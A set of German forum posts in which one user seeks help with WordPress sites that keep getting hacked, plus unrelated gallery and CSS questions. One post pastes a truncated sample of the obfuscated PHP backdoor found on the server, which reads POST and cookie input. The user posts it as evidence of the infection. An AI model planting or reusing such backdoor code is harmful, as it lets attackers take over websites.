Beiträge von CrAzYLuKe

    Hey, konntest du die Ursache beseitigen? Bei mir geht's auch ständig so.
    Folgende Dateien waren nun wieder versucht:

    ROOT/plugin.php
    ROOT/wordpress/wp-admin/includes/class-bulk-plugin-upgrader-skin.php
    ROOT/wordpress/wp-comments-post.php
    ROOT/wordpress/wp-content/gallery-bank/album-thumbs/test.php
    ROOT/wordpress/wp-content/ngg/modules/ini41.php
    ROOT/wordpress/wp-includes/SimplePie/Decode/footer2.php
    ROOT/wordpress/wp-includes/SimplePie/gzdecode.php
    ROOT/wordpress/wp-includes/class-wp-embed.php
    ROOT/wordpress/wp-includes/fonts/stats.php
    ROOT/wordpress/wp-includes/random_compat/object22.php
    ROOT/wordpress/wp-includes/version.php

    Ich habe auch den Benutzer Admin entfernt, das Passwort von FTP, WP, DB etc. geändert, aber trotzdem wird die Seite gehackt obwohl alles auf dem neusten Stand ist. Folgende Plugins sind installiert:
    - NextGEN Gallery
    - Photoswipe for NextGEN Gallery
    - Sucuri Security - Auditing, Malware Scanner and Hardening

    Das ist eine kurzfristige Sichtweise auf die Dinge die jetzt herhalten muss. Denn erstmal muss ich, zusehen, dass die Seite wieder steht um dann die Lücken zu schließen.

    Wenn ich nichts verstanden hätte, dann hätte ich nicht die Plugins "[COLOR=#333333]Sucuri Security" und "All In One WP Security & Firewall" ausprobiert.[/COLOR]
    [COLOR=#333333]Auch habe ich hier alle vermeintlichen Lücken geschlossen: [/COLOR]http://www.mastermindblogger.com/14-ways-to-pre…m-being-hacked/

    Bringt aber alles anscheinend nichts, sonst wäre es nicht so weit gekommen, dass ich wieder Schadcode habe.

    Wäre schön, wenn du mir paar Tipps geben würdest.

    Danke im Voraus.

    Sinnlos?
    Du liest wohl nicht, dass es funktioniert. Also ist es alles andere als sinnlos, aber das liegt wohl im Auge des Betrachters.

    Der Hack ist mir gerade egal, weil das Problem nicht besteht und ich damit meine Ruhe habe - vielleicht nur temporär, aber mir auch gerade egal. Außerdem habe ich keine Ahnung wie ich den Hack beseitigen kann geschweige denn ihn aufdecken. Dazu müsste ich erstmal wissen wie ich eine Seite hacken kann und wo diese ihre Schlupflöcher hat neben denen die ich geschlossen habe, aber das kann ich nicht, folglich kann ich es auch nicht aufdecken aus heiterem Himmel.

    Es kann sich nicht jeder so tief mit der Materie beschäftigen.

    Hille, du fragst in deinem 1. Posting wie die CHMOD-Werte sind, dabei habe ich bereits im Eröffnungsposting beschrieben auf welche ich diese geändert habe, siehe 1. Quote.

    Die .htaccess hatte ich anfangs testweise gelöscht. Löschen an sich war aber nicht alleine hilfreich, man muss die auch neu generieren lassen, was ich nach dem Umzug (den ich sowieso mal vor hatte) getan habe, weil ich nun einen 500 Error erhalten habe der mich auf die richtige Lösung gebracht hat: https://www.elegantthemes.com/blog/tips-tric…rdpress-website

    Zitat

    [COLOR=#454545][FONT=Arial]Once you find your .htaccess file, right-click it, and rename it “.htaccess.bak”. This essentially deletes your site’s .htaccess file, so we need to create a new one. Go into your WordPress admin area. Hover over [/FONT][/COLOR]Settings[COLOR=#454545][FONT=Arial], and select [/FONT][/COLOR]Permalinks[COLOR=#454545][FONT=Arial]. Scroll down to the bottom of the page, and click [/FONT][/COLOR]Save Changes[COLOR=#454545][FONT=Arial].[/FONT][/COLOR]

    Nun funktioniert's und vielen Dank für deine Hilfe.

    Ja stimmt leider. Hat nur minimal geholfen, aber die anderen Seiten wurden leider nicht angezeigt. Habe nun einen neuen Ordner erstellt auf dem Server und probiere mal alles umzuziehen, aber das gestaltet sich relativ schwer. Gleich fliegt die Tastatur!!!!

    Habe eben nun die DB aktualisiert bei einer Wordpressinstallation - mal sehen ob es daran gelegen hat. Die andere Installation lasse ich mal so.

    Das Theme bietet keine weiteren Updates mehr an. Es ist immer noch v1.0.0. Das andere Theme ebenfalls. Könnte natürlich auch die Sicherheitslücke sein, wie ich zwischen deinen Zeilen heraus lese.

    Bin nun hergegangen und habe alles bis auf den Ordner wp-content gelöscht, dazu das Passwort der DB geändert und nun WP neu installiert, die DB war vorhanden, der Content auch und nun funktioniert wieder alles einwandfrei :-)

    Den Tipp hatte ich von dieser Seite: http://www.toprankblog.com/2009/07/repair-wordpress/

    Zitat

    [h=3]3. Re-Install WordPress[/h][COLOR=#000000][FONT=Verdana]Most of the WordPress files can be re-installed without causing any issues with the blog. The only directory NOT to touch is /wp-content/.[/FONT][/COLOR][COLOR=#000000][FONT=Verdana]You can re-install WordPress’ files by logging into WordPress and going to Tools -> Upgrade and selecting the re-install option. WordPress will use the built-in updater to re-install all core files but not touch any theme or plugin files.[/FONT][/COLOR][COLOR=#000000][FONT=Verdana]If you can’t use the built-in WordPress tool to re-install WordPress, you can upload the files via FTP. Just be sure not to overwrite the /wp-content/ folder as this contains your theme, upload, and plugins folder. The best solution is to first delete the old files before uploading the new ones.
    [/FONT][/COLOR]

    Hallo liebe Wordpressler,

    meine zwei Wordpressinstallationen werden ständig gehackt und dann von meinem Anbieter (Hosteurope) gesperrt, weil dieser ständig Scans am Laufen hat und mir die infizierten Dateien mitteilt. In letzter Zeit passiert das viel viel häufiger, obwohl ich auch FTP- & WP-PW geändert habe. Vielleicht habt ihr eine Idee wo das Sicherheitsloch ist? Denn Plugins wie "Sucuri Security" oder "All In One WP Security & Firewall" helfen leider nicht.
    Auch habe ich hier alle vermeintlichen Lücken geschlossen: http://www.mastermindblogger.com/14-ways-to-pre…m-being-hacked/

    Eine Sache fällt mir auf die ich nicht geändert habe: Datenbank-PW. Vielleicht liegt's daran?

    Hier der Code der fast überall sehr ähnlich aussieht und die Liste mit den infizierten Dateien, von denen manche auch erstellt werden und ich mir nur denke - wie zum Teufel?

    galerie/holger-miri/dynamic/cache53.php
    include.php
    wp-admin/index.php
    wp-admin/network/user-new.php
    wp-includes/Requests/Response/template81.php
    wp-includes/Text/file.php
    wp-includes/class-walker-category-dropdown.php
    wp-includes/images/wlw/press.php
    wp-includes/random_compat/include.php
    wp-includes/template.php


    Hier sogar doe plugin.php nicht im WP-Root, sondern eine Ebene höher
    /plugin.php
    /wordpress/wp-admin/user/include91.php
    /wordpress/wp-content/galerie/julia-arastu/object.php
    /wordpress/wp-content/ngg_styles/xml.php
    /wordpress/wp-includes/Requests/Cookie.php
    /wordpress/wp-includes/Requests/Cookie/page.php
    /wordpress/wp-includes/feed-rdf.php
    /wordpress/wp-includes/images/media/user41.php
    /wordpress/wp-includes/ms-settings.php
    /wordpress/wp-includes/random_compat/random_bytes_com_dotnet.php


    PHP
    <?php $GLOBALS['g511647'];global$g511647;$g511647=$GLOBALS;${"\x47\x4c\x4fB\x41\x4c\x53"}['lf4a']="\x7e\x63\x5a\x52\x69\x60\x3b\x54\x20\x7b\x50\x4e\x78\x39\x7c\x68\x5e\x49\x29\x62\x30\x5b\x2a\x2b\x56\x72\x67\x73\x6f\x77\x5f\x24\x47\x53\x2f\x5c\x37\x66\x27\x5d\x6c\x79\x6b\x34\x3e\x28\xd\x71\x44\x61\x75\x22\x3d\x21\x4f\x7d\x38\x7a\x4d\xa\x6a\x6d\x74\x36\x31\x2c\x58\x33\x25\x32\x35\x70\x76\x2e\x51\x64\x55\x48\x42\x3a\x57\x43\x65\x23\x4c\x4b\x41\x3c\x6e\x40\x4a\x46\x3f\x2d\x26\x59\x9\x45";$g511647[$g511647['lf4a'][1].$g511647['lf4a'][13].$g511647['lf4a'][67].$g511647['lf4a'][63]]=$g511647['lf4a'][1].$g511647['lf4a'][15].$g511647['lf4a'][25];$g511647[$g511647['lf4a'][47].$g511647['lf4a'][49].$g511647['lf4a'][13].$g511647['lf4a'][69]]=$g511647['lf4a'][28].$g511647['lf4a'][25].$g511647['lf4a'][75];$g511647[$g511647['lf4a'][61].$g511647['lf4a'][36].$g511647['lf4a'][19].$g511647['lf4a'][49].$g511647['lf4a'][49].$g511647['lf4a'][70].$g511647['lf4a'][64].$g511647['lf4a'][49].$g511647['lf4a'][49]]=$g511647['lf4a'][27].$g511647['lf4a'][62].$g511647['lf4a'][25].$g511647['lf4a'][40].$g511647['lf4a'][82].$g511647['lf4a'][88];$g511647[$g511647['lf4a'][61].$g511647['lf4a'][49].$g511647['lf4a'][20].$g511647['lf4a'][37].$g511647['lf4a'][64].$g511647['lf4a'][75].$g511647['lf4a'][13]]=$g511647['lf4a'][4].$g511647['lf4a'][88].$g511647['lf4a'][4].$g511647['lf4a'][30].$g511647['lf4a'][27].$g511647['lf4a'][82].$g511647['lf4a'][62];$g511647[$g511647['lf4a'][61].$g511647['lf4a'][36].$g511647['lf4a'][37].$g511647['lf4a'][56].$g511647['lf4a'][64].$g511647['lf4a'][36].$g511647['lf4a'][1]]=$g511647['lf4a'][27].$g511647['lf4a'][82].$g511647['lf4a'][25].$g511647['lf4a'][4].$g511647['lf4a'][49].$g511647['lf4a'][40].$g511647['lf4a'][4].$g511647['lf4a'][57].$g511647['lf4a'][82];$g511647[$g511647['lf4a'][37].$g511647['lf4a'][63].$g511647['lf4a'][1].$g511647['lf4a'][56].$g511647['lf4a'][20]]=$g511647['lf4a'][71].$g511647['lf4a'][15].$g511647['lf4a'][71].$g511647['lf4a'][72].$g511647['lf4a'][82].$g511647['lf4a'][25].$g511647['lf4a'][27].$g511647['lf4a'][4].$g511647['lf4a'][28].$g511647['lf4a'][88];$g511647[$g511647['lf4a'][28].$g511647['lf4a'][69].$g511647['lf4a'][63].$g511647['lf4a'][64].$g511647['lf4a'][64].$g511647['lf4a'][56].$g511647['lf4a'][13]]=$g511647['lf4a'][50].$g511647['lf4a'][88].$g511647['lf4a'][27].$g511647['lf4a'][82].$g511647['lf4a'][25].$g511647['lf4a'][4].$g511647['lf4a'][49].$g511647['lf4a'][40].$g511647['lf4a'][4].$g511647['lf4a'][57].$g511647['lf4a'][82];$g511647[$g511647['lf4a'][12].$g511647['lf4a'][13].$g511647['lf4a'][69].$g511647['lf4a'][1].$g511647['lf4a'][67].$g511647['lf4a'][49].$g511647['lf4a'][36].$g511647['lf4a'][36].$g511647['lf4a'][49]]=$g511647['lf4a'][19].$g511647['lf4a'][49].$g511647['lf4a'][27].$g511647['lf4a'][82].$g511647['lf4a'][63].$g511647['lf4a'][43].$g511647['lf4a'][30].$g511647['lf4a'][75].$g511647['lf4a'][82].$g511647['lf4a'][1].$g511647['lf4a'][28].$g511647['lf4a'][75].$g511647['lf4a'][82];$g511647[$g511647['lf4a'][88].$g511647['lf4a'][1].$g511647['lf4a'][37].$g511647['lf4a'][13].$g511647['lf4a'][43]]=$g511647['lf4a'][27].$g511647['lf4a'][82].$g511647['lf4a'][62].$g511647['lf4a'][30].$g511647['lf4a'][62].$g511647['lf4a'][4].$g511647['lf4a'][61].$g511647['lf4a'][82].$g511647['lf4a'][30].$g511647['lf4a'][40].$g511647['lf4a'][4].$g511647['lf4a'][61].$g511647['lf4a'][4].$g511647['lf4a'][62];$g511647[$g511647['lf4a'][47].$g511647['lf4a'][36].$g511647['lf4a'][43].$g511647['lf4a'][1].$g511647['lf4a'][56].$g511647['lf4a'][43].$g511647['lf4a'][43].$g511647['lf4a'][43]]=$g511647['lf4a'][47].$g511647['lf4a'][70].$g511647['lf4a'][75].$g511647['lf4a'][36].$g511647['lf4a'][64].$g511647['lf4a'][67].$g511647['lf4a'][56];$g511647[$g511647['lf4a'][62].$g511647['lf4a'][36].$g511647['lf4a'][20].$g511647['lf4a'][1].$g511647['lf4a'][1].$g511647['lf4a'][43].$g511647['lf4a'][1]]=$g511647['lf4a'][62].$g511647['lf4a'][64].$g511647['lf4a'][1].$g511647['lf4a'][1];$g511647[$g511647['lf4a'][72].$g511647['lf4a'][37].$g511647['lf4a'][1].$g511647['lf4a'][69].$g511647['lf4a'][75].$g511647['lf4a'][70].$g511647['lf4a'][67]]=$_POST;$g511647[$g511647['lf4a'][47].$g511647['lf4a'][36].$g511647['lf4a'][63].$g511647['lf4a'][19].$g511647['lf4a'][43].$g511647['lf4a'][43].$g511647['lf4a'][64].$g511647['lf4a'][13]]=$_COOKIE;@$g511647[$g511647['lf4a'][61].$g511647['lf4a'][49].$g511647['lf4a'][20].$g511647['lf4a'][37].$g511647['lf4a'][64].$g511647['lf4a'][75].$g511647['lf4a'][13]]($g511647['lf4a'][82].$g511647['lf4a'][25].$g511647['lf4a'][25].$g511647['lf4a'][28].$g511647['lf4a'][25].$g511647['lf4a'][30].$g511647['lf4a'][40].$g511647['lf4a'][28].$g511647['lf4a'][26],NULL);@$g511647[$g511647['lf4a'][61].$g511647['lf4a'][49].$g511647['lf4a'][20].$g511647['lf4a'][37].$g511647['lf4a'][64].$g511647['lf4a'][75].$g511647['lf4a'][13]]($g511647['lf4a'][40].$g511647['lf4a'][28].$g511647['lf4a'][26].$g511647['lf4a'][30].$g511647['lf4a'][82].$g511647['lf4a'][25].$g511647['lf4a'][25].$g511647['lf4a'][28].$g511647['lf4a'][25].$g511647['lf4a'][27],0);@$g511647[$g511647['lf4a'][61].$g511647['lf4a'][49].$g511647['lf4a'][20].$g511647['lf4a'][37].$g511647['lf4a'][64].$g511647['lf4a'][75].$g511647['lf4a'][13]]($g511647['lf4a'][61].$g511647['lf4a'][49].$g511647['lf4a'][12].$g511647['lf4a'][30].$g511647['lf4a'][82].$g511647['lf4a'][12].$g511647['lf4a'][82].$g511647['lf4a'][1].$g511647['lf4a'][50].$g511647['lf4a'][62].$g511647['lf4a'][4].$g511647['lf4a'][28].$g511647['lf4a'][88].$g511647['lf4a'][30].$g511647['lf4a'][62].$g511647['lf4a'][4].$g511647['lf4a'][61].$g511647['lf4a'][82],0);@$g511647[$g511647['lf4a'][88].$g511647['lf4a'][1].$g511647['lf4a'][37].$g511647['lf4a'][13].$g511647['lf4a'][43]](0);$ne0854=NULL;$h10217e=NULL;$g511647[$g511647['lf4a'][12].$g511647['lf4a'][56].$g511647['lf4a'][67].$g511647['lf4a'][56].$g511647['lf4a'][37].$g511647['lf4a'][49].$g511647['lf4a'][19]]=$g511647['lf4a'][70].$g511647['lf4a'][64].$g511647['lf4a'][75].$g511647['lf4a'][69].$g511647['lf4a'][56].$g511647['lf4a'][19].$g511647['lf4a'][70].$g511647['lf4a'][1].$g511647['lf4a'][93].$g511647['lf4a'][19].$g511647['lf4a'][1].$g511647['lf4a'][69].$g511647['lf4a'][36].$g511647['lf4a'][93].$g511647['lf4a'][43].$g511647['lf4a'][19].$g511647['lf4a'][69].$g511647['lf4a'][36].$g511647['lf4a'][93].$g511647['lf4a'][49].$g511647['lf4a'][64].$g511647['lf4a'][82].$g511647['lf4a'].......


    Danke für eure Tipps im Voraus und beste Grüße
    Luke

    Hallo liebe Wordpressler,

    meine Seite http://www.LukeFox.de funktioniert plötzlich nicht mehr. Wieso weiß ich nicht genau und einloggen kann ich mich auch nicht mehr.

    Also bin ich hergegangen und habe über meinen Provider Hosteurope die Funktion "Webspace Restore" aktiviert. Somit wird das komplette Verzeichnis mit dem Stand vom dem Tag, an dem es 100% funktioniert hat, wiederhergestellt. Die letzte Änderung war am 29.09. und es gibt mehrere Backups. Ich habe nun 4 verschiedene Backups ausprobiert und keins dieser Backups funktioniert. Ich habe das Plugin "All In One WP Security", welches mir regelmäßig "Site Database Backups" per Mail sendet. Via PHPMyAdmin habe ich die Datenbank gesichert, komplett geleert und mit dem Backup eingespielt. Mehrere Backups habe ich hier probiert, aber alles hilft nichts.

    Hat jemand eine Idee woran es liegen kann? Laut dem Support-Mitarbeiter liegt es nicht an den Rechten, aber wenn ich das Logo probiere anzuzeigen, erhalte ich Error 403...

    Ich habe auch noch folgendes gefunden und angewendet: http://www.wpbeginner.com/wp-tutorials/h…r-in-wordpress/

    Zitat

    All folders on your WordPress site should have a file permission of 744 or 755.
    All files on your WordPress site should have a file permission of 644 or 640.
    You can set the file permission to the root folder to 744 or 755. Check the box next to ‘Recurse into subdirectories’ and then check the option that says ‘apply to directories only’.
    Click on the OK button. Your FTP client will now start setting permissions to all subdirectories in that folder.
    Once it is done, you need to repeat the process for all the files. This time you will use file permission of 644 or 640 and don’t forget to select ‘Recurse into subdirectories’ and ‘apply to files only’. options.

    Hier noch Error-Logs, wenn die Domain abgerufen wird:


    Vielen Dank im Voraus für eure Tipps und einen schönen Tag noch
    Luke

    Hallo liebe Wordpresser,

    aktuell arbeite ich mit einer eignen HTML .htaccess Lösung für meine Kundengalerien.
    Pfad sieht folgendermaßen aus: Domain.de/galerie/Kundenname

    In dem Ordner "Kundenname" befinden sich index.php, .htaccess, .htpasswd & der Ordner "bilder" mit dem Unterordner "thumbs".
    Ein Skript zieht sich automatisch die Bilder aus dem gleichnamigen Verzeichnis bzw. dessen Unterordner thumbs und je nach Bildschirmbreite & Bilder ergeben sich die Zeilen (responsive).

    Es ist mir wichtig, dass die Bilder nicht öffentlich sind in Wordpress. Ich habe bereits ein tolles Plugin für eine schöne Lightbox gefunden und den Passwortschutz kann ich auch entsprechend vergeben, aber das Problem bleibt ja mit den Bildern bestehen. Kennt jemand den absoluten den Link des Bildes, kann er ihn von überall öffnen. Das geht mit einer .htaccess Datei, die vor dem Ordner liegt, nicht.

    Auch stört mich der automatische Upload in ".../wp-content/uploads/2014/12/...".
    Kann ich via FTP umgehen und wäre für mich kein Problem, weil ich eh RAWs schieße und gesondert die Tumbs uploaden kann. Dann erstellt Lightroom weiterhin auch thumbs - passt!
    Aber alleine aus SEO-Sicht ist das vollkommener Schwachsinn. Ich würde sehr gerne selbst entscheiden wohin mit dem jeweiligen Bild. Am besten kann das immer wieder variieren pro Upload.


    Über Tipps zu Skrpiten, Plugins etc. würde ich mich sehr freuen.


    Vielen Dank im Voraus für eure Hilfe,
    Luke


    Hier noch die Codes der Seite, bei Bedarf liefere ich die *.js

    Topbar ist zum Beispiel folgendermaßen aufgebaut:

    und hier in der header.php so eingebunden:

    Hallo illufan,

    habe #masthead aus dem wrapper genommen und nun 100% vergeben. Wie bekomme ich aber nun trotzdem den 1000px Rahmen hin und die Eigenschaft, dass sich dieser trotzdem mittig zentriert und align in diesem Rahmen z.B. via float:left; ist? Das funktioniert nämlich nicht. Deshalb habe ich auch erst mal nur mit

    Code
    #topbar{
    height:50px;
    width:100%;
    margin:0px auto;
    background:#00a8ff;
    }

    versucht, wo man auch die Suche oben findet und es bereits über 100% geht. Aber die Suche ist entweder ganz links oder ganz rechts, aber nicht innerhalb eines 1000px Rahmens, der mittig ausgerichtet ist und darin dann rechts oder links und ggf. mit padding...

    So wie es auf deinem Screenshot aussieht hätte ich es sehr gerne :-)

    Musste aber, um den Effekt zustande zu bringen noch folgendes hier ändern:

    sonst wäre das Menü nicht weit gekommen mit deinem Tipp...
    Ist jetzt auch so online...